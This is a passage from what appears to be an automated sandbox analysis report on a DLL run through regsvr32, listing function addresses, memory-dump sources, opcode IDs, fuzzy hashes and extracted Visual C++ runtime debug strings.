                                                      • Instruction Fuzzy Hash: AC31E2B090034E8FCB48DF65C48A4DE7FB0FB68398F104619E859A6250D3B896A5CFC5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180017638 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BHj
                                                      • API String ID: 0-429444599
                                                      • Opcode ID: b2d81b77ec5a3d92ed60f1e2a925d42953c8b0d81e9e004bfe4218ede8c6c85b
                                                      • Instruction ID: 88d82d5a62f7e83910e755dc00f06a4804c179e3d48da98a41081325a3075538
                                                      • Opcode Fuzzy Hash: b2d81b77ec5a3d92ed60f1e2a925d42953c8b0d81e9e004bfe4218ede8c6c85b
                                                      • Instruction Fuzzy Hash: 2F31B2B190078E8FCF84DF64C88A5DE7BB0FB58358F010A09E869A6250D7B8D665CF85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800078A4 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: h
                                                      • API String ID: 0-130632579
                                                      • Opcode ID: d5fc1072884fae1f5b57c471a7f51524b23a4deaf3d031234e0c0be062cfd6f2
                                                      • Instruction ID: cf3c4ac770fe2f70a1efbbc55b0bf253fcb3f834dda7a796d3e0b8f6df5914ba
                                                      • Opcode Fuzzy Hash: d5fc1072884fae1f5b57c471a7f51524b23a4deaf3d031234e0c0be062cfd6f2
                                                      • Instruction Fuzzy Hash: 803102705187C48BD789CFA8C48965EFBE1FB94384F50492DF486867A0C7F8D948CB86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800050D4 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ?%4
                                                      • API String ID: 0-422666221
                                                      • Opcode ID: 9a50b58e01a5729271d6177eeb6adb68723f1c473c55e35b3503dad5704e2603
                                                      • Instruction ID: a7a624d76b7a6b6a49308da5d267df16e75217d08dbc55e4173753466c7a619f
                                                      • Opcode Fuzzy Hash: 9a50b58e01a5729271d6177eeb6adb68723f1c473c55e35b3503dad5704e2603
                                                      • Instruction Fuzzy Hash: 0721A470628780AB878CDF28D49981BBBE1FBC9304F906A1CF9C68B364D7749445CB46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180001870 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ve
                                                      • API String ID: 0-2619166483
                                                      • Opcode ID: 0af36e16279e0b52c57c96dd2be3cf2d778334959a734097dc29c8b03be7ea9c
                                                      • Instruction ID: bd1518f744f48cc188204749d08526443734dde3f23549b257c943e1dafbc1e4
                                                      • Opcode Fuzzy Hash: 0af36e16279e0b52c57c96dd2be3cf2d778334959a734097dc29c8b03be7ea9c
                                                      • Instruction Fuzzy Hash: 3B217BB16187858BC748DF28C55951ABBE1FBCC318F404B5DF8CAAA360D378D645CB4A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800026DC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hk
                                                      • API String ID: 0-2736353058
                                                      • Opcode ID: f042022579c6dc077ee2635b55382d47991fd87e705928ebfd6682ca687bc5a7
                                                      • Instruction ID: 887fdeaeec6620913bccc1519bb94b7ab545cc472d3a2f82c737665b3ebe67cb
                                                      • Opcode Fuzzy Hash: f042022579c6dc077ee2635b55382d47991fd87e705928ebfd6682ca687bc5a7
                                                      • Instruction Fuzzy Hash: 20319CB4628384AB8388DF28C49981ABBF1FBC9304F806A1DF8868A260D775D445CB03
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018000529C Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @Bp!
                                                      • API String ID: 0-2853746471
                                                      • Opcode ID: ef82bde12d532e04876809b878463bf9d85bf8adc7e5172117a9a71904663532
                                                      • Instruction ID: a42def5e4906ba5408d95fb28ee36c9633a666dd8c6a1d0dabe2f17b10b73553
                                                      • Opcode Fuzzy Hash: ef82bde12d532e04876809b878463bf9d85bf8adc7e5172117a9a71904663532
                                                      • Instruction Fuzzy Hash: 8831F37080034E8BCB44DF64D48A4DE7FB0FB28398F11461AE869A6210D3B48694CFC5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180006308 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: _&%
                                                      • API String ID: 0-276555772
                                                      • Opcode ID: 8f3b61786a1347c07c3d5db82c2bc2daa848de2eab2d644bf824955350391771
                                                      • Instruction ID: 84b034befa84842a6d26d9f5413634863003efd6eec9a48b68f2958c9e87747a
                                                      • Opcode Fuzzy Hash: 8f3b61786a1347c07c3d5db82c2bc2daa848de2eab2d644bf824955350391771
                                                      • Instruction Fuzzy Hash: C3217BB06187848B8748DF28D45A51ABBE1FBCC308F404B5DF4CAAA360D3789609CB4A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800295C8 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: V
                                                      • API String ID: 0-2990084971
                                                      • Opcode ID: 1782258294aa137d61fe32651e2643f77913c71ff09afc5f450ca4bece25d7e7
                                                      • Instruction ID: 19a784c3393b647e1d02845cf9d1e0035701b9012461bc7b4b972f754d4b287b
                                                      • Opcode Fuzzy Hash: 1782258294aa137d61fe32651e2643f77913c71ff09afc5f450ca4bece25d7e7
                                                      • Instruction Fuzzy Hash: E021ADB4529780AFD788DF28D09981FBBF0FB89304F806A1CF9868B360E3759445CB02
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800229CC Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: fe_
                                                      • API String ID: 0-1346747655
                                                      • Opcode ID: 656de1a6cae0373b094f44c9878c04d225c006d82b161423a6aec508986bcc20
                                                      • Instruction ID: 9f8913945123cb4278df7be958afc5fc5d749fa594805d3e5c5ffa2821aade6f
                                                      • Opcode Fuzzy Hash: 656de1a6cae0373b094f44c9878c04d225c006d82b161423a6aec508986bcc20
                                                      • Instruction Fuzzy Hash: 25215DB55183818B9348EF28D44A51BBBE1BB8D34CF404B5DF4CEAA260D778D615CF4A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180022290 Relevance: .1, Instructions: 139COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 690f928848312d3e50bce6c98363679f754364b802b69089bfd2d1cc95353951
                                                      • Instruction ID: f4bbdddc4ebc6fe898ddfb3184844cd7ab88b5746f894e32bccfd4327ba112cf
                                                      • Opcode Fuzzy Hash: 690f928848312d3e50bce6c98363679f754364b802b69089bfd2d1cc95353951
                                                      • Instruction Fuzzy Hash: F751247152078DABDBC9DF28C8CAA9C3BA1FB44754F806219FC468A261D774D5C9CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180008134 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a7876522931334601bd90a80625b7f157024bfeead9eee4300288ec184fcbc12
                                                      • Instruction ID: d7e3191637b78f1be9ff87ab698ad538cd7d2d45c46478ba59590cd585685a95
                                                      • Opcode Fuzzy Hash: a7876522931334601bd90a80625b7f157024bfeead9eee4300288ec184fcbc12
                                                      • Instruction Fuzzy Hash: 5761B1B490078E8FCF48DF68D8595DE7BB0FB48318F014A19FC6696250D7B49A25CB84
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001E2F4 Relevance: .1, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 88e65efb6d3fa20939ff192da4dfa840d39aac14346873756c43568c41f67993
                                                      • Instruction ID: f17689cc06c9532d3252f7dc5abd3373f404a3f8166a5e21e79f0a6996b359c5
                                                      • Opcode Fuzzy Hash: 88e65efb6d3fa20939ff192da4dfa840d39aac14346873756c43568c41f67993
                                                      • Instruction Fuzzy Hash: 0B41B870608B488FC768DF19D08976ABBF1FB89711F40856EE68AC7351DB319848CB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800280C8 Relevance: .1, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 485b6be602952e656e1e94650c6f168335af82f45d0d0f5b4aa22a8c646e7c56
                                                      • Instruction ID: 9422144e28ecc4a9930a11d21f18f8515329dd70f686b1b52883d16e1825d5f7
                                                      • Opcode Fuzzy Hash: 485b6be602952e656e1e94650c6f168335af82f45d0d0f5b4aa22a8c646e7c56
                                                      • Instruction Fuzzy Hash: 2A414D34509B588FD768DF28918A75ABBE0FF99310F004A5EE58EC7362D770D949CB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180006954 Relevance: .1, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c92699b14e6c2b4fd34943bfb19e45adab91cb197e26a720392e823bcd093906
                                                      • Instruction ID: bbd244a3cf3555809e115011e05a98a3e8d5fd40b217627e69400f11bfb30a94
                                                      • Opcode Fuzzy Hash: c92699b14e6c2b4fd34943bfb19e45adab91cb197e26a720392e823bcd093906
                                                      • Instruction Fuzzy Hash: 745193B590434ACFCF48CF64D48A5CE7FB0FB68398F214219E856A6250D3B496A4CFD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180012500 Relevance: .1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 22d6ccee6f38bff831197d2bb081fadbeca5e8b7e3ae62232a51f5952ffcfbdb
                                                      • Instruction ID: 8b5374169f69602128bd3032aff790cb1f354843cf4962b6e845d1f3af7287dc
                                                      • Opcode Fuzzy Hash: 22d6ccee6f38bff831197d2bb081fadbeca5e8b7e3ae62232a51f5952ffcfbdb
                                                      • Instruction Fuzzy Hash: 9741A0B180078E8BCB44CFA8D84A5DE7BF0FB18358F104A19F865A6250D3B89668CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180022140 Relevance: .1, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c574afae7ba18edac7d834e0abd82c8c7458f2e927091ead9319fe9aa7316d5f
                                                      • Instruction ID: c15f1aaae4e4e13c906589d5588e8395ab5dda45948680e718f465f07a8a5b6e
                                                      • Opcode Fuzzy Hash: c574afae7ba18edac7d834e0abd82c8c7458f2e927091ead9319fe9aa7316d5f
                                                      • Instruction Fuzzy Hash: EC41C4B190038E8FDF48CF64C84A4DE7BB0FB58358F104619E86AA7250D3B8D665CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180020E40 Relevance: .1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4afcbbeb8beafd70164a818e9f41371ad943d797e3468922fcea1c7c9f2e7631
                                                      • Instruction ID: c896a4b3abc40741a1500648b31ed7fd3e584cfdc10005e9d212c87c64feccae
                                                      • Opcode Fuzzy Hash: 4afcbbeb8beafd70164a818e9f41371ad943d797e3468922fcea1c7c9f2e7631
                                                      • Instruction Fuzzy Hash: 2541C1B181035E8BDB48CFA8D48A5DE7FB0FB68398F204619E855A6214D3B496A4CFC5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001C1B8 Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6edc2e1e82c131bcdf0495892124b6f46e3b6b242b9e6d8eacab558a4eb6cfc8
                                                      • Instruction ID: db142853bc0ceb5379a440845187b42230294cb0dc3411c083ed269e5703ce5c
                                                      • Opcode Fuzzy Hash: 6edc2e1e82c131bcdf0495892124b6f46e3b6b242b9e6d8eacab558a4eb6cfc8
                                                      • Instruction Fuzzy Hash: E831AFB090034E8FCB48CF68C4865DE7FB0FB58398F114219E85AA6210D3B496A5CFC5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800162BC Relevance: .1, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c455d63c0866516b303eef6870e820fc06907d5cf01b5e138b1643b6a977dfc
                                                      • Instruction ID: 032a8ed253072f6fd1b05e82d0325949fdf78283cb4c6b9cd1929990fdaa7975
                                                      • Opcode Fuzzy Hash: 6c455d63c0866516b303eef6870e820fc06907d5cf01b5e138b1643b6a977dfc
                                                      • Instruction Fuzzy Hash: F93195B050078A8BCF48DF68C85A5AE3BB1FB48308B404A2DFD269A350D7B49664CB84
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180021444 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 91382f82a540e9ea2bbfb40e05a393f87671ab464d1f075959bb3f3378a52dce
                                                      • Instruction ID: 9b1437c5de0cc84ebb9c914bb54d42d7cbbf0eefc466e3cb3beb54b329be6ed5
                                                      • Opcode Fuzzy Hash: 91382f82a540e9ea2bbfb40e05a393f87671ab464d1f075959bb3f3378a52dce
                                                      • Instruction Fuzzy Hash: E631D5B190034E8FCF48DF68C48A4DE7FB1FB68398F100619E816A6250D3B896A4CFC5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180015F24 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76bccbb128cfcb22620bb2b416fc3ca44309eaef87c6278072ef16f6a50a05e8
                                                      • Instruction ID: e5161e45e20286f18a7c233b2d95f7c6d50d739ad8bc374cfda940a225cf7d0d
                                                      • Opcode Fuzzy Hash: 76bccbb128cfcb22620bb2b416fc3ca44309eaef87c6278072ef16f6a50a05e8
                                                      • Instruction Fuzzy Hash: DD315C305187849BC3999B24C4C925EBEE1FB85399FA0682CF1C3C6264D774C98A8B06
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180026A90 Relevance: .1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 33d7533839bea32518041b6ca5f29ea3ef2f9d4ceb6278032ee9dcaf63ac5804
                                                      • Instruction ID: e62117077ddfbae32c834d069a9ab80343e2b26cefae081dcf738b8df2b77597
                                                      • Opcode Fuzzy Hash: 33d7533839bea32518041b6ca5f29ea3ef2f9d4ceb6278032ee9dcaf63ac5804
                                                      • Instruction Fuzzy Hash: B22148B56183848BD749DF28D44A41ABBE1FB9C74CF400B6DF4CAAB250D378D649CB4A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001A988 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8ecf74b073e9749c9a707f8928f85ed0a2f8ff40eefc5cc2f6539f01074e035d
                                                      • Instruction ID: 503aa3927fff6e4ad3ec536c6aa42fcab205a0bd32951b21a7cd1c91f46ab624
                                                      • Opcode Fuzzy Hash: 8ecf74b073e9749c9a707f8928f85ed0a2f8ff40eefc5cc2f6539f01074e035d
                                                      • Instruction Fuzzy Hash: 3F2150B46187848BD748DF28C45641ABBE1FB9C358F804B2DF4CAA7350D7789A05CF4A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001DEFC Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9daa26d15846afd04c30d9d8c23f2645a3612f544d511007b76009de9b77635d
                                                      • Instruction ID: bec49874bf3906a1a9314e610e6330a75ea1af3aa415f07e7967bd5f7b72e726
                                                      • Opcode Fuzzy Hash: 9daa26d15846afd04c30d9d8c23f2645a3612f544d511007b76009de9b77635d
                                                      • Instruction Fuzzy Hash: 61215CB16187848BD748DF28D05941FBBE0BB8D358F405B2DF8CAA6351D7789644CB4A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2F7F1 Relevance: 79.1, APIs: 23, Strings: 22, Instructions: 376COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_unlock_wcsftime_l
                                                      • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")$6o$Pl
                                                      • API String ID: 242677333-579931786
                                                      • Opcode ID: 90fb5dc47a0cb7e52882a682e6518eda47d2e5e2933cc617357387334d7819cd
                                                      • Instruction ID: 59d0ad1821d2987490fb14e41c4dc7dbbb96a2632b775096c591c8feb24f6032
                                                      • Opcode Fuzzy Hash: 90fb5dc47a0cb7e52882a682e6518eda47d2e5e2933cc617357387334d7819cd
                                                      • Instruction Fuzzy Hash: DF321A3190CA8695EBB0CB18EC543EE73A0F784345FA04125D6CD47AA9DB7EE549CF81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2B470 Relevance: 40.5, APIs: 7, Strings: 16, Instructions: 260COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invoke_watson_if_error$FileModuleName
                                                      • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowW$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$wcscpy_s(szExeName, 260, L"<program name unknown>")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
                                                      • API String ID: 1949418964-1840610800
                                                      • Opcode ID: 44b701395b3347ba89d33a25413c6d043cef3cadf6afd38b3a3e0c178ea01b00
                                                      • Instruction ID: afa63f492d6c70519d8e627b7e85a2bc97528eb7c2a0a9c735d6d19596090ce3
                                                      • Opcode Fuzzy Hash: 44b701395b3347ba89d33a25413c6d043cef3cadf6afd38b3a3e0c178ea01b00
                                                      • Instruction Fuzzy Hash: 90F1D636609BC694E6B0DB54E8483AEB3E4F389780F604125DACD43BB9DB7ED194CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2AE40 Relevance: 38.7, APIs: 5, Strings: 17, Instructions: 207COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
